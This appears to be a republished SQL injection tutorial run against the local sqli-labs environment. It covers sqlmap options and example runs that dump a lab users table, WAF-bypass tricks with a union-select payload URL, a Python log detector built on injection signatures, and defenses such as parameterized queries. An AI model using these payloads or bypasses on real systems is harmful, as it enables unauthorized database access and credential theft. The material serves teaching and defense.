
How to analyze SQLMap and SQLi injection Defense

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains how to analyze SQL injection with SQLMap and how to defend against SQLi. Many readers are not familiar with the topic, so the material below is summarized step by step; I hope you can take something from it.

Part I: Introduction to sqlmap

1.1 Using sqlmap

1. Earlier I covered some basic SQL injection statements, but manual injection is tedious. With sqlmap, a powerful SQL injection tool, we can extract the data automatically.

2. Introduction to sqlmap

(1) sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities and the takeover of the database server behind them. It has a very powerful detection engine, many features useful to penetration testers, and supports database fingerprinting, access to the underlying file system, and command execution through out-of-band connections.

Official website: sqlmap.org

(2) Supported databases: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

(3) Supported injection techniques:

# UNION query SQL injection (union-based injection)

# Error-based SQL injection (error-based injection)

# Boolean-based blind SQL injection (boolean-based blind injection)

# Time-based blind SQL injection (time-delay blind injection)

# Stacked queries SQL injection (several statements injected and executed in one request)

1.2 sqlmap installation and environment building

1. Main steps of the sqlmap installation

(1) Install the Python environment: sqlmap requires Python.

Python download address: https://www.python.org/downloads/release/python-2715/

sqlmap is best compatible with the Python 2.x line. (The Python installer is just a matter of clicking Next; the one thing to change is the installation path, here set to C:\Users\Administrator\python, so that the sqlmap directory can be reached directly from the command line and is easier to work with.)

(2) Do not install Python under a path containing Chinese characters, and add Python to the PATH environment variable.

(3) Download and install sqlmap, and change its installation directory to C:\Users\Administrator\sqlmap.

(4) Test the Python environment: open a cmd command line and enter python. The following prompt indicates that the installation succeeded.

C:\Users\Administrator> python

Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:37:19) [MSC v.1500 64 bit (AMD64)] on win32

Type "help", "copyright", "credits" or "license" for more information.

>>> exit()

(5) Test sqlmap: in the cmd command line run sqlmap.py -h (mind the path).

C:\Users\Administrator\sqlmap> sqlmap.py -h # view the help

1.3 Common sqlmap parameters

# (1) Obtain database names, column names and privileges

--dbs # list all databases

--dbms mysql # specify the back-end database type

--users # list all database users (database-local user names)

--passwords # retrieve the database users' passwords (only readable with sufficient permission)

--technique # specify which injection technique(s) to use

--current-db # current database

--banner # retrieve the database banner (version identification)

-D database_name --tables # -D specifies the database, --tables lists the tables in it

-D database_name -T table_name --columns # -T specifies the table, --columns lists its columns

-D database_name -T table_name -C column_1,column_2 --dump

# -C specifies the columns, --dump retrieves and displays the entries

--users # lists the database management users; all of them are listed when the current user may read the table that holds all users.

--current-user # the current database user; in most databases this is the account used to manage the data.

--is-dba # determines whether the current user is a DBA; returns True if so.

--privileges # when the current user may read the table holding all users, enumerates each user's privileges and sqlmap tells you which user is the database super-administrator. Use -U to restrict the enumeration to one user.

--proxy # use a proxy server, e.g. --proxy http://local:8080

# (2) Specify a prefix and suffix:

# sqlmap cannot detect many interfering characters on its own; when the injection point needs special closing, the prefix and suffix can be specified manually. For example, for a query of the form

select * from users where id=('1') and 1

# --prefix=PREFIX injection payload prefix string

# --suffix=SUFFIX injection payload suffix string

e.g. sqlmap -u "www.target.com/index.php?id=1" -p id --prefix "')" --suffix "AND"

# (3) Export results:

sqlmap -u "www.a.com/1.php?id=1" --file-write="d:/1.txt" --file-dest="E:/wwwroot/web/one.php"

--batch # fully automatic: never ask for user input, use the default behaviour

--start=N --stop=N # number of the first and of the last table entry to retrieve

--dump # dump the data

--dump-all # dump all data

--purge-output / --purge # clear the sqlmap output (cache) directory

--sql-shell # prompt for an interactive SQL shell, similar to a SQL query analyzer; the default output path is .sqlmap (dot sqlmap) in the user's home directory

1.4 Practical sqlmap examples

# General commands for Less-1 to Less-65 (these are the most commonly used parameters and must be mastered)

# (1) Get all database names

C:\Users\Administrator\sqlmap> python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" --dbs --dbms=mysql --batch

# Explanation:

-u is followed by the URL to test

--dbs retrieves all databases

--dbms specifies the database type, here mysql

--batch runs non-interactively with the default answers

-D security --tables retrieves the table names of the database named security

-D security -T users --columns retrieves the column names of the users table in the security database

-D security -T users -C username,password --dump # retrieves the data of the username and password columns in the users table of the security database; --dump displays the result

# results:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] owasp

[*] performance_schema

[*] security

[*] test

# (2) Get the current database name

C:\Users\Administrator\sqlmap> python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" --current-db --batch

# Results:

Current database: 'security'

# (3) Get the table names of the current database

C:\Users\Administrator\sqlmap> python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -D security --tables --batch

# Results:

Database: security

[4 tables]

+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

# (4) Get the column names of the users table

C:\Users\Administrator\sqlmap> python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -D security -T users --columns --batch

# Results:

Database: security

Table: users

[3 columns]

+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

# (5) Get the contents of the username and password columns of the users table

C:\Users\Administrator\sqlmap> python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" -D security -T users -C username,password --dump --batch

# Results:

Database: security

Table: users

[13 entries]

+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | Mobile     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+

Part II: Introduction to SQLi WAF bypass

2.1 SQL injection WAF bypass methods

Note: the examples here only illustrate the bypass approaches; real scenarios are more complex, and several bypass methods can be combined and encoded together.

1. Once you know how to perform SQL injection, how can SQL injection be prevented? Common filtering approaches:

# (1) Filter comment characters

# (2) Filter and / or

# (3) Filter select / union

# (4) Filter using a keyword blacklist

2. How can the filtering of and / or be bypassed?

# (1) Case variation: MySQL keywords are case-insensitive, so mixed-case forms still execute correctly.

# (2) Encoding: MySQL supports hexadecimal, so hexadecimal or URL encoding can be used.

# (3) Symbol substitution: replace the word with its operator, and => &&, or => ||.

# (4) Inline and multi-line comments, and double writing: insert a comment into the sensitive word, a/**/nd, or write the keyword inside itself, oORr, so that one pass of the filter leaves or behind.

3. There are of course other methods; here we take these filtering methods as examples to explain how they are bypassed.

In real scenarios there are WAF devices, and a WAF in practice prevents SQL injection by filtering certain keywords.

2.2 SQL injection WAF bypass experiments

1. Comment characters are filtered (Less-23 as the example)

# (1) Why comments are filtered: in a normal SQL statement a comment only serves as an explanation. When exploiting a SQL injection vulnerability, however, comment characters are what close off a trailing single quote, multiple single quotes, double quotes, a single parenthesis or multiple parentheses.

Single-line comment: --+ , -- followed by a space, or #

Multi-line comment: /* multi-line comment content */

# (2) The filter function preg_replace

preg_replace(mixed $pattern, mixed $replacement, mixed $subject): performs a regular expression search and replace.

$pattern: the pattern to search for; a string or an array of strings.

$replacement: the string or array of strings to replace with.

$subject: the target string or array of strings to search and replace in.

# (3) Bypassing the comment filter:

Since the comment characters are filtered, the trailing single quote cannot be closed off with a comment; instead it is balanced in another way, for example by ending the payload with or '1 or similar, so that the query's own closing quote is consumed.

http://127.0.0.1/sqli/Less-23/?id=-1%27%20union%20select%201,database(),%273

2. How are and / or bypassed once they are filtered? (Less-25 as the example)

(1) Source code analysis: the source replaces or and and with an empty string.

(2) Operation steps

3. How is space filtering bypassed? (Less-26 as the example)

(1) Use %0a (a newline) in place of a space.

4. How are select / union bypassed once they are filtered? (Less-27 as the example)
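As an added example that is not part of the original article or of sqlmap, the following Python detector takes the defender's view of sections 1.4 and 2.1 together: it parses constructed web-server access-log lines, applies the normalizations that undo the bypass tricks listed above (URL decoding, case folding, %0a for space, inline comments, doubled keywords such as oORr) and then matches union, tautology, time-based and stacked-query signatures on the normalized query string, and separately flags sqlmap's default User-Agent. The log lines, addresses, user agents and function names are all constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample requests in Apache "combined" log format; hosts, times,
# user agents and requests are invented, modelled on the article's lab URLs.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2019:10:00:01 +0000] "GET /sqli/Less-1?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [31/May/2019:10:00:02 +0000] "GET /sqli/Less-1?id=1%27%20AND%201=1-- HTTP/1.1" 200 512 "-" "sqlmap/1.3.5#stable (http://sqlmap.org)"
10.0.0.9 - - [31/May/2019:10:00:03 +0000] "GET /sqli/Less-23/?id=-1%27%20uNiOn%2F**%2FsElEcT%201,database(),%273 HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.9 - - [31/May/2019:10:00:04 +0000] "GET /sqli/Less-25/?id=1%27%20oORr%201=1%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [31/May/2019:10:00:05 +0000] "GET /search?q=and%20then%20some HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

KEYWORDS = ("or", "and", "union", "select")


def _doubled_pattern(kw):
    """Match kw written inside itself at any split point (oORr, anandd, ...):
    the double-write trick that survives one pass of a delete-the-keyword filter."""
    alternatives = [
        re.escape(kw[:i]) + "(?:" + re.escape(kw) + ")+" + re.escape(kw[i:])
        for i in range(1, len(kw))
    ]
    return re.compile("|".join(alternatives))


DOUBLED = {kw: _doubled_pattern(kw) for kw in KEYWORDS}

# Signatures are applied to the normalised query string, never to the raw one.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "tautology": re.compile(r"'\s*(?:or|and|\|\||&&)\s*['\w]+\s*=\s*['\w]+"),
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "stacked-query": re.compile(r";\s*(?:select|insert|update|delete|drop)\b"),
}


def normalize(raw):
    """Return (normalised text, list of evasion tricks seen).

    Undoes the tricks from section 2.1 (single or double URL encoding, case
    changes, %0a for space, inline comments, doubled keywords) so that the
    signatures see roughly what the database would actually parse.
    """
    tricks = []
    s = unquote(unquote(raw)).replace("+", " ").lower()
    if "\n" in s or "\t" in s:
        tricks.append("newline-as-space")
    s = re.sub(r"\s+", " ", s)
    # The server treats a comment as whitespace: union/**/select -> union select
    without_comments = re.sub(r"/\*.*?\*/", " ", s)
    if without_comments != s:
        tricks.append("inline-comment")
    s = re.sub(r"\s+", " ", without_comments)
    for kw, pat in DOUBLED.items():
        collapsed = pat.sub(kw, s)  # oorr -> or, as a one-pass filter would leave it
        if collapsed != s:
            tricks.append("doubled-" + kw)
            s = collapsed
    return s, tricks


def analyze_line(line):
    """Parse one log line; return a finding dict if the request looks like an
    injection attempt or a sqlmap run, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if "sqlmap" in m.group("ua").lower():  # sqlmap's default User-Agent names itself
        reasons.append("sqlmap user-agent")
    query = m.group("path").partition("?")[2]  # only the query string carries parameters here
    norm, tricks = normalize(query)
    reasons.extend(name for name, pat in SIGNATURES.items() if pat.search(norm))
    if not reasons:
        return None
    return {"ip": m.group("ip"), "path": m.group("path"), "normalized": norm,
            "reasons": reasons, "tricks": tricks}


def scan_log(text):
    """Return the findings for every flagged request in a log text."""
    return [f for f in map(analyze_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["path"], "->", ", ".join(f["reasons"] + f["tricks"]))
```

The order matters: normalization runs before matching, because a filter that matches on the raw request is exactly what the tricks in section 2.1 defeat. The `tricks` list is reported as supporting evidence but does not on its own flag a request, so ordinary encoded text such as the last sample line stays clean.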

Part III: SQLi injection defense

3.1 SQL injection defense methods

1. Common protective measures:

# (1) Turn off error display: display_errors=Off in the PHP configuration file php.ini.

# (2) Magic quotes (equivalent to addslashes): when magic_quotes_gpc=On in php.ini, all single quotes ('), double quotes ("), backslashes (\) and NUL (null) characters in submitted variables are automatically escaped with a backslash.

# (3) Filter the data: for example, filter out common keywords such as and / or / union.

# (4) Restrict the privileges of the user the application connects with: give each database its own dedicated account, and do not connect as root.

# (5) Prepared statements and parameterized queries (PDO): the user-supplied parameters are bound to the statement and the execution returns a Boolean result, instead of simply "stitching" the data into the SQL string; this prevents SQL injection.

# (6) Hardware protection (a WAF or similar appliance).
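As an added example, not taken from the article, from sqli-labs or from sqlmap, here is a Python/SQLite stand-in for the lab's users table that shows why measure (5) holds where (2) and (3) do not: the Less-1 style of stitching the request value into the SQL text is run side by side with a bound parameter, both fed the or '1 style tautology payload from section 2.2, with integer validation of id as a first check on top. Magic quotes (measure 2) were removed in PHP 5.4, and the keyword filters of measure (3) are exactly what section 2.1 bypasses; in a PHP application the same placeholder idea is PDO's prepare() and execute(). The table rows, names and helper functions here are assumptions made for the example.

```python
import re
import sqlite3

# Constructed rows modelled on the article's users table (id, username,
# password); the values are invented for this example.
SEED_ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def make_db():
    """In-memory SQLite stand-in for the lab's MySQL security.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The Less-1 pattern: the request value is 'stitched' into the SQL text,
    so quotes and keywords inside it become part of the statement."""
    sql = "SELECT id, username FROM users WHERE id='%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Measure (5): the driver binds the value to a placeholder; it stays data
    and can never change the structure of the statement."""
    return conn.execute("SELECT id, username FROM users WHERE id=?", (user_id,)).fetchall()


def is_valid_id(raw):
    """Input validation on top of binding: a record id is a positive integer."""
    return re.fullmatch(r"[1-9][0-9]*", raw) is not None


def lookup_safe(conn, raw_id):
    """Validate, convert to the expected type, then bind."""
    if not is_valid_id(raw_id):
        raise ValueError("rejected id parameter: %r" % raw_id)
    return lookup_parameterized(conn, int(raw_id))


def demo():
    """Run the same tautology payload through both query styles."""
    conn = make_db()
    payload = "1' or '1'='1"  # the or '1 style closing from section 2.2
    return {
        "vulnerable": lookup_vulnerable(conn, payload),        # every row comes back
        "parameterized": lookup_parameterized(conn, payload),  # no row has that id
        "normal": lookup_safe(conn, "1"),                      # the intended lookup
        "payload_rejected": not is_valid_id(payload),          # never reaches the database
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-16s %s" % (name, result))
```

The bound version returns no rows for the payload because the whole string is compared as a value against the id column, and the validation step rejects it before any query runs; the concatenated version returns every user, which is the behaviour the sqlmap runs in section 1.4 exploit.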
